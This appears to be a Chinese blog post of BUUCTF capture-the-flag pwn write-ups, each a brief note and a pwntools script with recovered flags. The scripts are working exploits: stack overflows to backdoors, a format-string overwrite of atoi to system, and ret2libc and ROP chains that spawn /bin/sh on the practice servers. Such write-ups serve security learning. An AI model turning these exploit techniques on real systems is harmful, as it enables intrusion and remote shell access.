buuctf

Posted on Edited on In Views: Word count in article: 3.4k Reading time ≈ 3 mins.
buuctf 持续更新

rip

题目给出ubuntu18,.且是64位程序需要考虑栈平衡

lambda部分省略

1
2
3
4
5
6
7
ret = 0x0000000000401016
flag = 0x401186
payload = b'a'*0xf + b'b'*8 + p64(ret) + p64(flag)
#ru(b'please input')
sl(payload)

flag{2b384cc7-6cc9-4d5e-a659-0635a86cdad5}

warmup_csaw_2016

ubuntu16.04,题目给出了一个地址可以cat flag.txt

1
2
3
4
5
6
7
8
ru(b'WOW:')
flag = int(r(8),16)
print(hex(flag))
payload = b'a'*(64+8) + p64(flag)
ru(b'>')
sl(payload)

itr()

ciscn_2019_n_1

栈溢出修改栈上的变量,计算出两个变量的位之差

1
2
3
4
5
6
7
from pwn import *
import struct
#p = process('./pwn')
p = remote('node5.buuoj.cn',28132)
payload = b'a' * 0x2c + struct.pack('<f', 11.28125) # + p64(0x41348000)
p.sendline(payload)
p.interactive()

pwn1_sctf_2016

ubuntu16.04(在其他版本也行)程序将I替换为you通过strcpy造成了溢出,有后门函数

1
2
3
padding = 20 # 0x3c = 60; 60/3=20;
payload = b'I'*padding + b'a'*4 + p32(0x8048f0d)
sl(payload)

level0

ubuntu16.04 read()栈溢出有后门

1
2
3


flag{16a465c7-eed0-4eda-8fcb-dd5ca85ee50d}

[第五空间2019 决赛]PWN5

格式化字符串,任意地址写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# 思路一:格式化字符串改atoi为system,第二次读入'/bin/sh\x00'
1atoi_got = elf.got['atoi']
system_plt = elf.plt['system']
 
payload=fmtstr_payload(10,{atoi_got:system_plt})
p.recv()
sl(payload)
p.recv()
sl(b'/bin/sh\x00')

itr()
# 思路二:改passwd 用fmstr_payload 需要指定架构

# payload = p32(0x0804C044)+p32(0x0804C045)+p32(0x0804C046)+p32(0x0804C047)+b"%10$n%11$n%12$n%13$n"
# 这一种改0x0804c044的随机值为0x10101010
payload = fmtstr_payload(10,{0x0804c044:0x666})

p.sendline(payload)

passwd = str(0x666)
p.sendline(passwd)
p.interactive()

jarvisoj_level2

read()溢出,有system和/bin/sh

1
2
3
4
5
6
7
bin_sh = 0x0804A024
system = 0x08048320
payload = b'a'*(0x88+4) + p32(system) + b'aaaa' + p32(bin_sh)
sl(payload)

itr()
flag{d935d6a8-444a-4bab-896f-32f177ac0db9}

ciscn_2019_n_8

直接写入14个p32(17)就行了

1
2
3
4
5
6
7
8
>>> from pwn import *
>>> p = remote('node5.buuoj.cn',29574)
[x] Opening connection to node5.buuoj.cn on port 29574
[x] Opening connection to node5.buuoj.cn on port 29574: Trying 117.21.200.176
[+] Opening connection to node5.buuoj.cn on port 29574: Done
>>> payload = p32(17)*14
>>> p.sendline(payload)
>>> p.interactive()

bjdctf_2020_babystack

自己输入输入长度,溢出,有后门

1
2
3
4
5
6
ru(b'[+]Please input the length of your name:')
p.sendline(b'32')
ru(b'[+]What\'s u name?')
p.sendline(b'a'*(0x10+8)+p64(0x4006e6))

itr()

ciscn_2019_c_1

strlen()有'\0'截断,所以在加密函数中可以直接跳出循环,然后打ret2libc即可

libc版本,buu上的64位2.27

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
puts_plt = 0x4006e0
puts_got = elf.got['puts']
pop_rdi = 0x0000000000400c83
ret = 0x00000000004006b9
padding = 0x50 + 8 - 1
payload = b'\0' + b'a'*padding + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(0x4009a0)
ru(b'Input your choice!')
sl(b'1')
ru(b'Input your Plaintext to be encrypted')
sl(payload)
puts_addr = l64()
print(hex(puts_addr))

base_addr = puts_addr - libc.symbols['puts']
system = base_addr + libc.symbols['system']
bin_sh = base_addr + next(libc.search(b'/bin/sh'))

payload2 = b'\0' + b'a'*padding + p64(ret) + p64(pop_rdi) + p64(bin_sh) +p64(system) + p64(0) 
ru(b'Input your Plaintext to be encrypted')
sl(payload2)

itr()

收获

C语言代码伪代码要一行一行分析,分析循环跳出的条件

jarvisoj_level2_x64

read()栈溢出

1
2
3
4
5
6
7
8
9
10
from pwn import *
p = remote('node5.buuoj.cn',26824)

system = 0x4004c0
bin_sh = 0x600A90
rdi = 0x00000000004006b3
payload = b'a'*(0x80+8) + p64(rdi) + p64(bin_sh) + p64(system)

p.sendline(payload)
p.interactive()